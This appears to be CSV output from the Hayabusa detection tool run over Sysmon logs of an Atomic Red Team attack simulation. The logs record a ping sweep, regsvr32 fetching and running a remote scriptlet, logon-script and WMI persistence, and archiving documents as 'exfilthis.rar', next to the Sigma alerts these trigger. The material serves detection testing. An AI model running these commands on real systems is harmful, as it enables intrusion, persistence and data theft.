2019-07-19 23:53:35.024 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.241 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2180 | PGUID: 747F3D96-D96F-5D31-0000-00105A853700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:35.559 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.242 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3556 | PGUID: 747F3D96-D96F-5D31-0000-0010C78F3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:36.025 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.243 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3788 | PGUID: 747F3D96-D970-5D31-0000-0010B4923700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:36.536 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.244 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7072 | PGUID: 747F3D96-D970-5D31-0000-0010A0953700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:37.012 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.245 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2700 | PGUID: 747F3D96-D971-5D31-0000-00108C983700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:37.505 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.246 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 352 | PGUID: 747F3D96-D971-5D31-0000-0010789B3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:38.043 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.247 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3120 | PGUID: 747F3D96-D972-5D31-0000-00106BA43700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:38.588 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.248 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6976 | PGUID: 747F3D96-D972-5D31-0000-001057A73700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:39.024 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.249 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2440 | PGUID: 747F3D96-D973-5D31-0000-0010A3AA3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:39.518 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.250 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5100 | PGUID: 747F3D96-D973-5D31-0000-00108FAD3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:40.006 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.251 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7144 | PGUID: 747F3D96-D974-5D31-0000-00107BB03700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:40.535 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.252 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5612 | PGUID: 747F3D96-D974-5D31-0000-001068B33700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:40.982 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.253 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 196 | PGUID: 747F3D96-D974-5D31-0000-001006BD3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:41.530 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.254 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1624 | PGUID: 747F3D96-D975-5D31-0000-001099C23700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:42.061 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6412 | PGUID: 747F3D96-D976-5D31-0000-00104AC63700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:42.276 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""arp -a"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6292 | PGUID: 747F3D96-D976-5D31-0000-0010DBCC3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:42.276 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious Network Command,,rules/sigma/process_creation/proc_creation_win_susp_network_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:42.301 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: arp -a | Process: C:\Windows\System32\ARP.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""arp -a"" | LID: 0x50951 | PID: 1340 | PGUID: 747F3D96-D976-5D31-0000-001034CF3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:42.404 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6312 | PGUID: 747F3D96-D976-5D31-0000-0010D8D53700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:42.815 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4444 | PGUID: 747F3D96-D976-5D31-0000-001041E83700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll | Process: C:\Windows\System32\regsvr32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll"" | LID: 0x50951 | PID: 2332 | PGUID: 747F3D96-D976-5D31-0000-001093EA3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:43.445 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll | LID: 0x50951 | PID: 3848 | PGUID: 747F3D96-D977-5D31-0000-00100A0E3800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:43.574 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1476 | PGUID: 747F3D96-D977-5D31-0000-0010771B3800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:44.026 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2832 | PGUID: 747F3D96-D978-5D31-0000-0010442F3800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:44.054 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll | Process: C:\Windows\System32\regsvr32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll"" | LID: 0x50951 | PID: 2076 | PGUID: 747F3D96-D978-5D31-0000-0010EB313800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:44.054 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:44.054 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:45.157 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 6152 | PGUID: 747F3D96-D978-5D31-0000-00101E7A3800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:46.204 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll | LID: 0x50951 | PID: 4336 | PGUID: 747F3D96-D97A-5D31-0000-00105DA83800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:46.565 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7148 | PGUID: 747F3D96-D97A-5D31-0000-001089BD3800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:46.589 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49728 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\regsvr32.exe | PID: 2076 | PGUID: 747F3D96-D978-5D31-0000-0010EB313800,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:46.589 +09:00,MSEDGEWIN10,3,high,Exec | Evas,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:46.848 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\syswow64\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll | Process: C:\Windows\SysWOW64\regsvr32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3564 | PGUID: 747F3D96-D97A-5D31-0000-00109DDC3800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:46.848 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:46.893 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll | Process: C:\Windows\System32\regsvr32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5828 | PGUID: 747F3D96-D97A-5D31-0000-001019DE3800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:46.893 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:46.975 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c IF %%PROCESSOR_ARCHITECTURE%% ==AMD64 ELSE | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4628 | PGUID: 747F3D96-D97A-5D31-0000-00102BE33800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:47.083 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll | Process: C:\Windows\SysWOW64\regsvr32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll | LID: 0x50951 | PID: 5788 | PGUID: 747F3D96-D97B-5D31-0000-00109DEB3800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:47.239 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6888 | PGUID: 747F3D96-D97B-5D31-0000-0010F0F03800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:54.976 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "" cmd.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4240 | PGUID: 747F3D96-D982-5D31-0000-0010DC633900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:54.976 +09:00,MSEDGEWIN10,1,high,Persis,Logon Scripts (UserInitMprLogonScript),,rules/sigma/process_creation/proc_creation_win_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:55.018 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d cmd.exe | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "" cmd.exe | LID: 0x50951 | PID: 3608 | PGUID: 747F3D96-D983-5D31-0000-00102E663900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:55.018 +09:00,MSEDGEWIN10,1,high,Persis,Logon Scripts (UserInitMprLogonScript),,rules/sigma/process_creation/proc_creation_win_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:54:01.925 +09:00,MSEDGEWIN10,13,high,Persis | LatMov,Logon Scripts (UserInitMprLogonScript) Registry,,rules/sigma/registry_event/sysmon_logon_scripts_userinitmprlogonscript_reg.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:54:01.925 +09:00,MSEDGEWIN10,13,medium,Persis,Common Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_common.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:54:01.955 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4944 | PGUID: 747F3D96-D989-5D31-0000-0010FC7B3900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:54:16.782 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""rar a -r exfilthis.rar *.docx"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2000 | PGUID: 747F3D96-D998-5D31-0000-001008B43900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:54:16.830 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2424 | PGUID: 747F3D96-D998-5D31-0000-00101BB73900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:54:57.044 +09:00,MSEDGEWIN10,19,info,,WMI Event Filter Activity,"Created | Namespace: ""root\\CimV2"" | Name: ""AtomicRedTeam-WMIPersistence-Example"" | Query: ""SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"" | User: MSEDGEWIN10\IEUser",rules/hayabusa/sysmon/events/19_WmiEventFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:54:58.819 +09:00,MSEDGEWIN10,20,info,,WMI Event Consumer Activity,"Created | Type: Command Line | Name: ""AtomicRedTeam-WMIPersistence-Example"" | Dst: ""C:\\Windows\\System32\\notepad.exe"" | User: MSEDGEWIN10\IEUser",rules/hayabusa/sysmon/events/20_WmiEventConsumerActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:02.378 +09:00,MSEDGEWIN10,21,info,,WMI Event Consumer To Filter Activity,"Created | Consumer: ""\\\\.\\ROOT\\subscription:CommandLineEventConsumer.Name=\""AtomicRedTeam-WMIPersistence-Example\"""" | Filter: ""\\\\.\\ROOT\\subscription:__EventFilter.Name=\""AtomicRedTeam-WMIPersistence-Example\""""",rules/hayabusa/sysmon/events/21_WmiEventConsumerToFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:02.806 +09:00,MSEDGEWIN10,21,info,,WMI Event Consumer To Filter Activity,"Deleted | Consumer: ""\\\\.\\ROOT\\subscription:CommandLineEventConsumer.Name=\""AtomicRedTeam-WMIPersistence-Example\"""" | Filter: ""\\\\.\\ROOT\\subscription:__EventFilter.Name=\""AtomicRedTeam-WMIPersistence-Example\""""",rules/hayabusa/sysmon/events/21_WmiEventConsumerToFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
